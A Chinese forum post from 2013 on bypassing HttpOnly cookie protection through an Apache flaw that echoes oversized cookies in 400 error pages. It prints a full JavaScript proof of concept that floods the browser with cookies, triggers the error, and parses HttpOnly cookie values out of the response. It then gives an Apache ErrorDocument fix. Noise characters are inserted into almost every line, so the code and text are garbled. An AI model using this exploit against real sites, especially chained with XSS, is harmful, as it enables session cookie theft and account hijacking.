很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。 u/ y9 U" W- ^" Q" s
5 b, i+ j8 S" @0 ^" r2 S, \
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:6 G' G* c7 m( ~( B& N
! C* B3 [! p& x2 f' ~
4 e: G7 d' w9 g" i8 f1 u. x/ |// http://www.exploit-db.com/exploits/18442/1 Y5 u# S6 [: M4 Y
function setCookies (good) {5 E ]- N: ?3 ~8 F' l. w" f6 E A
// Construct string for cookie value
! G4 f, p) I, x6 O- S, Z+ hvar str = "";
2 N3 f5 f! E9 }0 I, g0 X) U- u; ?8 lfor (var i=0; i< 819; i++) {
8 u6 G' k0 R: F. N) Q% istr += "x";' u0 X# s; Z, ]8 s. A9 s
}
# q( U8 w# }5 O) z7 M// Set cookies
4 M7 ^4 W) D. F- s' Sfor (i = 0; i < 10; i++) {( c# J& i! ^: x6 n* Y" H4 c, N
// Expire evil cookie
4 l/ V! W4 I# }if (good) {
/ c6 M2 @+ c8 l9 Jvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";: Q0 w+ S7 ?+ c" T2 q( U9 s
}
; i3 v5 M8 Y7 o/ F8 g% U' N. r// Set evil cookie7 V2 |* E; w! O8 R
else {/ |5 k& ^5 Z. v0 X8 x% q+ L! J
var cookie = "xss"+i+"="+str+";path=/";# g3 X. h+ z1 R8 k% `' a
}9 j: T y. C+ f; r1 V0 j3 q
document.cookie = cookie;
! F, }9 k2 u0 |* J$ q}7 p0 S* A7 K; s# O k- V
}
6 e5 K6 F' D. N/ z6 Bfunction makeRequest() {
# f1 Q# }8 g; RsetCookies(); }3 F% t+ ^3 r! @
function parseCookies () {
8 K5 x6 E% |1 }5 N! Q% y; {var cookie_dict = {};
; \! l" I* b z# \9 q( `// Only react on 400 status
, y7 P: C$ @& |, fif (xhr.readyState === 4 && xhr.status === 400) {
" C$ N! B8 f" v// Replace newlines and match <pre> content/ y/ i# N: `) e, o! g* \, V
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
& a) \( N! t1 H+ a6 Aif (content.length) {! W" d' ^! z- _$ b/ h! W z
// Remove Cookie: prefix
4 ]+ Q, \! c& S( o6 d* m' j- i8 _content = content[1].replace("Cookie: ", "");
! I1 x/ |. X6 t& D9 \$ ~& Mvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);) G" q+ C5 }. I' E
// Add cookies to object- f- [% x1 w0 x, l
for (var i=0; i<cookies.length; i++) {8 z$ C- X% U5 B, V4 Z: ]9 K. M! C
var s_c = cookies.split('=',2);, z1 h: U* _0 G% S D( E
cookie_dict[s_c[0]] = s_c[1];
4 D& E p4 ], q3 E9 P0 o}
k( S2 k, [. d- l$ A' [}5 I) o R* ?, x; H. z' S: r
// Unset malicious cookies
8 N0 E9 b9 I; ~% R4 D# w, _! DsetCookies(true);+ g* C. ~( }, Y5 {- Z' o
alert(JSON.stringify(cookie_dict));# B4 i2 l3 N* Y: G; `8 u7 b M
}3 q: C' g! q1 C- h" q' V% N
}! w K7 h' R$ Y
// Make XHR request# D ~$ L2 l8 N$ {
var xhr = new XMLHttpRequest();
* p% z8 T' y" a7 \9 Z" i2 axhr.onreadystatechange = parseCookies;) E8 ^) e( C+ S1 k5 I
xhr.open("GET", "/", true);
; G/ x, x" F3 g) ^% Vxhr.send(null);' [$ e% {' Q+ R# R8 d( M
}; L& y# C" _6 G- P/ x3 X
makeRequest();& X/ m$ E7 n, e" @; X/ k& W% R! e
, C4 h0 n8 [5 ]9 d- P你就能看见华丽丽的400错误包含着cookie信息。
8 W! u. h( _+ F% ~$ C+ |4 P, R6 W* P, E, S% U3 K
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
) D( x5 q# G/ R/ E
" X: v9 R; U; d+ ~; F( b修复方案:
$ p' ?5 ?0 r2 ~+ d2 L
7 l4 d; R$ _0 o4 FApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
6 H) H7 L7 s" W6 ?% o! E+ {6 s$ E" x. A" H) L0 W- |
In the event of a problem or error, Apachecan be configured to do one of four things,
. j3 O/ ~1 J5 o' n% V6 o0 y
8 P5 k. I' S2 K; N- O! E1. output asimple hardcoded error message输出一个简单生硬的错误代码信息9 Z h k4 m* ~7 x w6 Z. C* _
2. output acustomized message输出一段信息7 u6 h# B+ X- s5 P- S2 ~3 W
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
# E0 d/ ]* q6 \* d6 N" g4. redirect to an external URL to handle theproblem/error转向一个外部URL% G3 O4 l9 S' M" A5 I9 |/ `
, _# C% Q: R7 j经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
/ g, }+ p8 A/ F1 B
4 Y- O, R' P, \7 b- [5 n/ Q: `Apache配置:0 J! b; J1 g6 u3 B
2 V& z0 g- V( I
ErrorDocument400 " security test"3 K& u" }3 b k9 y' Q3 O
4 p) {% \# r8 o5 ]5 o! Y) h% A/ d6 i当然,升级apache到最新也可:)。" M2 {- k1 ^( j6 \4 p1 t
& y$ Q- d) [& Q" c, K参考:http://httpd.apache.org/security/vulnerabilities_22.html
" |; L3 V. U% {6 ~
% @' ?/ x6 n+ g% C2 A. T! [/ c |
发表于 2013-4-19 19:15:43
收藏
支持
反对